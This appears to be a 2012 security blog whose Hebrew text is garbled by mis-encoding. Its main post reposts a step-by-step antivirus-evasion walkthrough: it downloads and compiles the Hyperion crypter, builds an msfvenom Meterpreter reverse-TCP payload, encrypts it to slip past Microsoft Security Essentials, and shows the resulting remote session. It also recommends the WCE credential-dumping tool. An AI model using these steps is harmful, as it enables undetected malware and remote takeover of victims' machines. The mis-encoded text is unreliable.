Latest Security News

Show All

讬讜诪谉 砖讘讜注讬 21-27- 讗讜拽讟讜讘专 2012

讞砖讘转讬 讻讻讛 诇专砖讜诐 诇注爪诪讬 专讗砖讬 驻专拽讬诐 注讘讜专 讗讬专讜注讬 讗讘讟讞讛 讜砖讗专 讚讘专讬诐 诪注谞讬讬谞讬诐 砖谞转拽诇转讬 讘讛诐 讛砖讘讜注 砖注讘专 - 注讜讚 诇讗 住讙讜专 讘讗讬讝讛 讬讜诐 - 讗讘诇 讛专注讬讜谉 讛讜讗 诇讛转诪讬讚...讛诪诪诪 拽砖讛... 讟讜讘 谞转讞讬诇 讘谞讬住讜讬:

 -2012 21-27

  1. JAVA update - 砖讜讘 讞讜讝专 讛谞讬讙讜谉 ... 诇诪讬 砖注讜讚 诇讗 注讚讻讜谉 -讝讛 讛讝诪谉 诇砖讚专讙 诇 6.37 讗讜 诇 7.09 /  讗驻砖专 诇讛转讞讬诇 诇讝讛讜转 讗转 讙专住转 讛 JAVA 讛诪讜转拽谞转 讚专讱 讗转专 讝讛 讜诇讛转拽讚诐 讘讗转专 砖诇 JAVA 诇砖讚专讜讙  - 讗讜 诇讞诇讜驻讬谉 诇砖讚专讱 讗讜讟讜诪讗讟讬转.讚专讱 讗讙讘 ,诇驻讙讬注讜转 讛讗讞专讜谞讛 砖讛讜讙砖讛 诇专讬讜讜讬讜 注"讬 讞讜拽专 讗讘讟讞 诪讬讚注 驻讜诇谞讬 - 注讚讬讬谉 诇讗 讻转讘讜 转讬拽讜谉 - 诇驻讬 ORACLE 讬讟讜驻诇 讘专讘注讜谉 讛专讗砖讜谉 砖诇 2013 , 诪讜诪诇抓 诇诪讬 砖讗讬谉 诇讜 爪讜专讱 讘讛专爪转 讗驻诇讬拽爪讬讜转 诪讘住住讜转 JAVA 诇讛住讬专 讗转 转讜住祝 讛讚驻讚驻谉 注讘讜专 讙'讗讜讛 ,讜讘讻诇 诪拽专讛 诇注讘讜讚 注诐 讻专讜诐 讗讜 FF 讜 .诇 讗 注诐 IE


2. 谞住讬讜谉 讞讚讬专讛 讜讛转拽驻转 CYBER 注诇 诪讞砖讘讬 讛诪砖讟专讛 -注讜讚 驻专讟讬诐 讻讗谉 , 诪拽专讬讗讛 专讗砖讜谞讬转 , 谞专讗讛 讻讬 讛谞住讬讜谉 诪讝讻讬专 注砖专讜转 谞住讬讜谞讜转 砖讬讻谞讜注 诇诇讞讜抓 注诇 诇讬谞拽 讗讜 诇驻转讜讞 拽讜讘抓 讚专讱 讛诪讬讬诇 ,讘讚专讱 讻诇诇 诪讬讬诇讬诐 讗诇讜 拽砖讜专讬诐 诇驻砖讬注转 住讬讬讘专 - 讗讱 讘诪拽专讛 讛住驻爪讬驻讬 讛讝讛 讬转讻谉 讜讛讬讛 诪讚讜讛专 注诇 诪转拽驻转 讟专讜专 拽讬讘专谞讟讬 注"讬 讗讬专谉 ( 讻讱 讟讜注谞讬诐 诪讜诪讞讬 讛讗讘讟讞讛 砖讞拽专讜 讗转 讛注谞讬讬谉). 拽爪转 转诪讜讛讛 讘注讬谞讬讬 ,讛爪注讚 讛拽讬爪讜谞讬 砖诇 谞讬转讜拽 诪讞砖讘讬 讛诪砖讟专讛 诪讛讗讬谞讟专谞讟 讜诪诪注专讻讜转 谞讜住驻讜转 诪讞砖砖 诇讝诇讬讙转 诪讬讚注 ,讜讘谞讜住祝 讞住讬诪转 DOK 讘讻诇 讛讞讘专讛.
    • 讛讗诐 讗讬谉 诇诪砖讟专讛 诪注专讻讜转 谞讬讟讜专 诇讝诇讬讙转 诪讬讚注 砖注讜讘讚转 注诇 专拽注 拽讘讜注?
    • 讛讗诐 讗讬谉 诇诪砖讟专讛 讬讻讜诇转 诇谞转讞 驻谞讬讜转 讞砖讜讚讜转 诪转讜讱 讛讞讘专讛 诇讗讬谞讟专谞讟?
    • 诪讚讜注 诇讗 讞住讜诐 DOK 讻讘专讬专转 诪讞讚诇?
    • 诪注讘专 诇讗谞讟讬 讜讬专讜住 讛诪讜转拽谉 讘诪注专讻转 讛讚讜讗专 - 诪讚讜注 诇讗 讞讜住诪讬诐 讘诪砖讟专讛  讻 诇  拽讜讘抓 诪住讜讻谉 讻讙讜谉 EXE 讜 DLL??? 讻诇 住讜讙 讻讝讛 诪讜诪诇抓 砖讬砖诇讱 诇转讬讘讛 诪讬讜讞讚砖 讛诪讗讜砖专转 专拽 注"讬 讗谞砖讬诐 讗讘讟讞转 诪讬讚注.
    • 讘拽讬爪讜专 谞讬专讗讛 讻讬 驻讗谞讬拽讛 讜讛讞诇讟讜转 拽砖讜转 , 讛讬讜 讻讗谉 诇诪讞讜讜讬专.
  

驻讜专住诐 注诇 讬讚讬

Radware lunches new DDOS security site

 www.DDoSWarriors.com  
Provides comprehensive analysis on DoS and DDoS attack tools, trends, and threats
讬砖 讻讗谉 讞讜诪专讬诐 诪注谞讬讬谞讬诐 诪讗讚 讜诪拽讬驻讬诐 讘谞讜砖讗 讛转拽驻讜转 诪谞讬注转 砖讬专讜转 ,讻诇讬诐,讞讚砖讜转 讜讻讜,
讬爪讗 诇讬 诇讛讬驻讙砖 讜讗祝 诇砖诪讜注 讛专爪讗讛 诪讛诪讜诪讞讬诐 砖诇 专讚讜讜专 讜讘驻讬专讜砖 讬砖 砖诐 讻诪讜转 讬讚注 注爪讜诪讛 讜讬讞讜讚讬转.
诪讜诪诇抓!



驻讜专住诐 注诇 讬讚讬

Anti Virus evasion Technic -Hyperion tool

砖讬诪讜砖 讘砖讬讟讛 诪讬讜讞讚转 讛注讜砖讛 砖讬诪讜砖 讘讛爪驻谞讛 讘讻讚讬 诇诪谞讜注 讝讬讛讜讬 拽讜讘抓 讝讚讜谞讬 注"讬 讗谞讟讬讜讬专讜住讬诐

诇讛诇谉 讛讛讜专讗讜转 诇砖讬诪讜砖 注诇 bt5r3  诇拽讬诪驻讜诇 拽讜讚 讛 hyperion  讜诇砖讬诪讜砖 注诇 EXE 砖谞讘讞专:
讘讚拽转讬 讜讝讛 注讜讘讚!


taken  from 
****
I recently watched a presentation that rel1k gave at bSides Cleveland 2012, in which he revealed some of his top secret antivirus bypass techniques. He quickly explained and demonstrated Binary Droppers,ShellcodeexecPowershell injectionmodifying Metasploit payload templates, and PE crypters. This last one caught my attention, as I hadn’t heard of it before. The PE crypter that he demonstrated is called Hyperion, by nullsecurity. It works somewhat like a PE Packer, but instead of scrambling the payload and encapsulating it with explicit instructions on how to descramble it, the payload is encrypted and encapsulated with a weak 128-bit AES key, which is simply brute forced at the time of execution. Let’s try it out. Only the source files are made available, so we’ll have to compile it ourselves. Luckily, BackTrack provides the tools need to cross-compile executables.
root@bt:~# wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip
root@bt:~# unzip Hyperion-1.0.zip 
root@bt:~# cd Hyperion-1.0
root@bt:~/Hyperion-1.0# wine /root/.wine/drive_c/MinGW/bin/g++.exe ./Src/Crypter/*.cpp -o crypter.exe
root@bt:~/Hyperion-1.0# ls -l *.exe
-rwxr-xr-x 1 root root 580396 2012-07-29 16:05 crypter.exe
Now that we have our Hyperion crypter executable. Let’s create a Metasploit payload.
root@bt:~/Hyperion-1.0# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=443 -f exe >payload.exe
root@bt:~/Hyperion-1.0# ls -l *.exe
-rwxr-xr-x 1 root root 580396 2012-07-29 16:05 crypter.exe
-rw-r--r-- 1 root root  73802 2012-07-29 16:13 payload.exe






root@bt:~/Hyperion-1.0# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=443 -f exe >payload.exe
root@bt:~/Hyperion-1.0# ls -l *.exe
-rwxr-xr-x 1 root root 580396 2012-07-29 16:05 crypter.exe
-rw-r--r-- 1 root root  73802 2012-07-29 16:13 payload.exe



Before we encrypt our payload, let’s see if Microsoft Security Essentials (MSE) detects anything.







As you can see, MSE detected our payload as “Trojan:Win32/Swrort.A”. That’s no good, but that’s what Hyperion is supposed to help us get around. So, let’s try encrypting our payload.


root@bt:~/Hyperion-1.0# wine crypter.exe payload.exe encrypted_payload.exe

Opening payload.exe
Copied file to memory: 0x115818
Found valid MZ signature
Found pointer to PE Header: 0xe8
Found valid PE signature
Found a PE32 file
Number of Data Directories: 16
Image Base: 0x400000

Found Section: .text
VSize: 0xa966, VAddress: 0x1000, RawSize: 0xb000, RawAddress: 0x1000

Found Section: .rdata
VSize: 0xfe6, VAddress: 0xc000, RawSize: 0x1000, RawAddress: 0xc000

Found Section: .data
VSize: 0x705c, VAddress: 0xd000, RawSize: 0x4000, RawAddress: 0xd000

Found Section: .rsrc
VSize: 0x7c8, VAddress: 0x15000, RawSize: 0x1000, RawAddress: 0x11000

Input file size + Checksum: 0x1204e
Rounded up to a multiple of key size: 0x12050
Generated Checksum: 0x5e921e
Generated Encryption Key: 0x2 0x3 0x0 0x3 0x0 0x3 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0

Written encrypted input file as fasm array to:
-> Src\FasmContainer32\infile.asm

Written input file's image base to:
-> Src\FasmContainer32\imagebase.asm

Written input file's image size to:
-> Src\FasmContainer32\sizeofimage.asm

Written keysize to:
-> Src\FasmContainer32\keysize.inc

Starting FASM with the following parameters:
Commandline: Fasm\FASM.EXE Src\FasmContainer32\main.asm encrypted_payload.exe
FASM Working Directory: Z:\root\Hyperion-1.0

Executing fasm.exe

root@bt:~/Hyperion-1.0# flat assembler  version 1.69.31  (1310719 kilobytes memory)
5 passes, 0.5 seconds, 92672 bytes.

root@bt:~/Hyperion-1.0# ls -l *.exe
-rwxr-xr-x 1 root root 580396 2012-07-29 16:05 crypter.exe
-rwxr-xr-x 1 root root  92672 2012-08-02 16:53 encrypted_payload.exe
-rw-r--r-- 1 root root  73802 2012-07-29 16:13 payload.exe



And if we copy our encrypted payload to our Windows host…







Ah, nothing to see here :-) Let’s see if it works.


msf  exploit(handler) > [*] Sending stage (752128 bytes) to 192.168.10.129
[*] Meterpreter session 1 opened (192.168.10.128:443 -> 192.168.10.129:1047) at 2012-08-02 17:17:53 -0400

msf  exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information                    Connection
  --  ----                   -----------                    ----------
  1   meterpreter x86/win32  VULNXP\Administrator @ VULNXP  192.168.10.128:443 -> 192.168.10.129:1047 (192.168.10.129)



Oh, you know that’s right!



You’ll notice that I didn’t upload this to VirusTotal to see how many anti-virus vendors detect our payload as malicious. It’s pretty well known now that this is one place anti-virus vendors go to find new payloads that they need to create signatures for detection. So, your best option for testing custom payloads is to simply install the version of anti-virus that you are trying to bypass.



Also, as rel1k stated in his presentation, the stub used to encapsulate the payload is static, so anti-virus vendors could easily create a signature for these payloads. He suggests modifying the source so that it is polymorphic. Alas, I have no idea how to do that right now, so maybe we will cover that in later post. Happy Crypting!





This entry was posted on August 2, 2012, 5:43 pm and is filed under AV BypassSecurity. You can follow any responses to this entry through RSS 2.0. Both comments and pings are currently closed.







Comments are closed.
















驻讜专住诐 注诇 讬讚讬






































          

        

          

        

          

        










讛专爪讗讛 诪讜诪诇爪转 砖诇 讬驻转讞 注诪讬转  -sexy defense  




















From derbycon 2012 - A  lecture from iftach amit  about playing good defense 



watch it















驻讜专住诐 注诇 讬讚讬






















转讜讜讬讜转:
,
,


























Cyber Security Events Time Line 






























A very nice timeline of events which includes : cyber crime ,cyber warfare and other importent security events .







check it out here




















驻讜专住诐 注诇 讬讚讬






































          

        

          

        

          

        









Cool SciFi Name Generator


















Need a nick name? a fake identity ?



consider try this site:

















驻讜专住诐 注诇 讬讚讬














































Windows Credentials Editor recomanded -post exploitation password dumping \pass the hash \kerberos and more tool


















讻诇讬 诇讞砖讬驻转 住住诪讗讜转 讜讻谉 诇 PASS THE HASH 讛注讜讘讚 讙诐 注诇 WIN7 讜 SERVER 2008



讛讬讞讜讚 砖诇讜 讛讜讗 砖讛拽专讬讗讛 诪转讘爪注转 讬砖讬专讜转 诪讛讝讬讻专讜谉 讜诇讗 讚专讱 拽讘爪讬诐 ( SAM  REG 讜讻讜) 



诇讗 诇砖讻讜讞 诇谞住讜转 wcf -w 



-)











taken from their site:











What is WCE?



Windows Credentials Editor (WCE) is a security tool that allows to list Windows logon sessions and add, change, list and delete associated credentials (e.g.: LM/NT hashes, Kerberos tickets and cleartext passwords).



The tool allows users to:


    

  • Perform Pass-the-Hash on Windows
    • 

  • 'Steal' NTLM credentials from memory (with and without code injection)
    • 

  • 'Steal' Kerberos Tickets from Windows machines
    • 

  • Use the 'stolen' kerberos Tickets on other Windows or Unix machines to gain access to systems and services
    • 

  • Dump cleartext passwords stored by Windows authentication packages
    • 




WCE is a security tool widely used by security professionals to assess the security of Windows networks via Penetration Testing.









What is the current version?



The current version of WCE 32bit is v1.3beta; you can download it here and the current version of WCE 64bit is v1.3beta; you can download it here.












驻讜专住诐 注诇 讬讚讬






































        

      









Subscribe to:
Comments (Atom)